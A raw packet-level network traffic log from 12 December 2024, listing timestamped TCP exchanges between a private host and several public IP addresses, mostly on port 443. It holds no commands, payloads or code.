                                                                                                                                                                                                          Dec 12, 2024 00:29:00.916598082 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.920563936 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.920634031 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.928481102 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.928550959 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.030098915 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.030309916 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.036309004 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.036381960 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.042386055 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.042463064 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.045602083 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.045679092 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.051294088 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.051354885 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.056751013 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.056818008 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.059708118 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.059788942 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.065201998 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.065284014 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.070655107 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.070728064 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.073307991 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.073376894 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.078074932 CET4434976735.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.078262091 CET4434976735.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.078301907 CET49767443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.078314066 CET4434976735.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.078325033 CET49767443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.078363895 CET49767443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.078805923 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.078877926 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.078906059 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.078954935 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.079021931 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.079375982 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.079412937 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.081623077 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.081684113 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.081701040 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.081775904 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.081828117 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.081911087 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.081934929 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.081957102 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.081983089 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.098997116 CET49773443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.099076986 CET44349773104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.099148035 CET49773443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.099541903 CET49773443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.099576950 CET44349773104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.337961912 CET49776443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.338049889 CET44349776104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.338139057 CET49776443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.338313103 CET49776443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.338335991 CET44349776104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.288863897 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.289115906 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.289161921 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.289495945 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.289774895 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.289844036 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.289896965 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.312625885 CET44349773104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.312915087 CET49773443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.312977076 CET44349773104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.313452959 CET44349773104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.313740969 CET49773443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.313833952 CET44349773104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.313849926 CET49773443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.331327915 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.335552931 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.355331898 CET44349773104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.366060972 CET49773443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.592546940 CET44349776104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.592858076 CET49776443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.592920065 CET44349776104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.593410015 CET44349776104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.593708038 CET49776443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.593818903 CET44349776104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.593822002 CET49776443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.635329962 CET44349776104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.645131111 CET49776443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.750041008 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.750236034 CET4434977235.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.750317097 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.750317097 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.750396967 CET49772443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.759191990 CET44349773104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.759413004 CET44349773104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.759521961 CET49773443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.760175943 CET49773443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.760215044 CET44349773104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:03.034611940 CET44349776104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:03.034735918 CET44349776104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:03.034785986 CET49776443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:03.034795046 CET44349776104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:03.034820080 CET44349776104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:03.034873962 CET49776443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:03.056062937 CET49776443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:03.056094885 CET44349776104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:03.560065985 CET49779443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:03.560158968 CET44349779104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:03.560240984 CET49779443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:03.560426950 CET49779443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:03.560458899 CET44349779104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:03.563286066 CET4972380192.168.2.4199.232.214.172
                                                                                                                                                                                                          Dec 12, 2024 00:29:03.683651924 CET8049723199.232.214.172192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:03.683706045 CET4972380192.168.2.4199.232.214.172
                                                                                                                                                                                                          Dec 12, 2024 00:29:04.768929005 CET44349779104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:04.769181967 CET49779443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:04.769217968 CET44349779104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:04.769675016 CET44349779104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:04.769941092 CET49779443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:04.770030022 CET44349779104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:04.770090103 CET49779443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:04.811346054 CET44349779104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:05.223047972 CET44349779104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:05.223144054 CET44349779104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:05.223210096 CET49779443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:05.224145889 CET49779443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:05.224162102 CET44349779104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:05.230802059 CET49782443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:05.230890989 CET44349782104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:05.230963945 CET49782443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:05.231178999 CET49782443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:05.231215000 CET44349782104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:05.764940977 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:05.764952898 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:05.765033007 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:05.765816927 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:05.765825987 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.443310976 CET44349782104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.443656921 CET49782443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.443675041 CET44349782104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.444138050 CET44349782104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.444777012 CET49782443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.444864035 CET44349782104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.444967031 CET49782443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.491341114 CET44349782104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.887676001 CET44349782104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.887761116 CET44349782104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.887954950 CET49782443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.888495922 CET49782443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.888516903 CET44349782104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.980382919 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.980668068 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.980700016 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.981156111 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.981544971 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.981628895 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.981749058 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.981818914 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.981837034 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.981950998 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:06.981991053 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.599898100 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.600027084 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.600080013 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.600099087 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.600176096 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.600220919 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.600229979 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.600327015 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.600372076 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.600378990 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.608051062 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.608103037 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.608112097 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.616308928 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.616362095 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.616372108 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.663213968 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.663224936 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.709387064 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.796161890 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.801578999 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.801640987 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.801654100 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.810470104 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.810570955 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.810579062 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.817847967 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.818042040 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.818051100 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.825364113 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.825459957 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.825469017 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.825531006 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.825591087 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.825726032 CET49785443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.825743914 CET44349785104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.853656054 CET49786443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.853710890 CET44349786104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.853810072 CET49786443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.853971958 CET49786443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:07.854001045 CET44349786104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:09.068394899 CET44349786104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:09.068684101 CET49786443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:09.068691015 CET44349786104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:09.069794893 CET44349786104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:09.070199013 CET49786443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:09.070259094 CET44349786104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:09.070393085 CET49786443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:09.111351013 CET44349786104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:09.514866114 CET44349786104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:09.515022993 CET44349786104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:09.515089035 CET49786443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:09.515578032 CET49786443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:09.515595913 CET44349786104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:11.140357018 CET49787443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:11.140391111 CET44349787104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:11.140561104 CET49787443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:11.140966892 CET49787443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:11.140980959 CET44349787104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:12.375263929 CET44349787104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:12.375593901 CET49787443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:12.375619888 CET44349787104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:12.376087904 CET44349787104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:12.376363993 CET49787443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:12.376447916 CET44349787104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:12.376504898 CET49787443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:12.376580954 CET49787443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:12.376636982 CET44349787104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:12.376743078 CET49787443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:12.376784086 CET44349787104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.116714954 CET44349787104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.116966963 CET44349787104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.117055893 CET44349787104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.117079973 CET49787443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.117115974 CET44349787104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.117172003 CET49787443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.117182016 CET44349787104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.117291927 CET44349787104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.117352962 CET49787443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.118087053 CET49787443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.118104935 CET44349787104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.124145031 CET49788443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.124244928 CET44349788104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.124366045 CET49788443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.124995947 CET49788443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.125036001 CET44349788104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.602452993 CET49789443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.602492094 CET44349789172.67.189.38192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.602577925 CET49789443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.602902889 CET49789443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.602926016 CET44349789172.67.189.38192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.340543985 CET44349788104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.341012955 CET49788443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.341078997 CET44349788104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.341789961 CET44349788104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.342080116 CET49788443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.342183113 CET44349788104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.342216969 CET49788443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.383409977 CET44349788104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.397358894 CET49788443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.788542986 CET44349788104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.788739920 CET44349788104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.788960934 CET49788443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.789630890 CET49788443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.789675951 CET44349788104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.814976931 CET44349789172.67.189.38192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.815407991 CET49789443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.815434933 CET44349789172.67.189.38192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.817456961 CET44349789172.67.189.38192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.817536116 CET49789443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.817806959 CET49789443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.817837000 CET49789443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.817907095 CET49789443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.817933083 CET44349789172.67.189.38192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.817991018 CET49789443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.818181992 CET49790443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.818255901 CET44349790172.67.189.38192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.818336010 CET49790443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.818516016 CET49790443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:14.818550110 CET44349790172.67.189.38192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.046983004 CET44349790172.67.189.38192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.048427105 CET49790443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.048496962 CET44349790172.67.189.38192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.050090075 CET44349790172.67.189.38192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.050165892 CET49790443192.168.2.4172.67.189.38
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.056368113 CET49790443192.168.2.4172.67.189.38
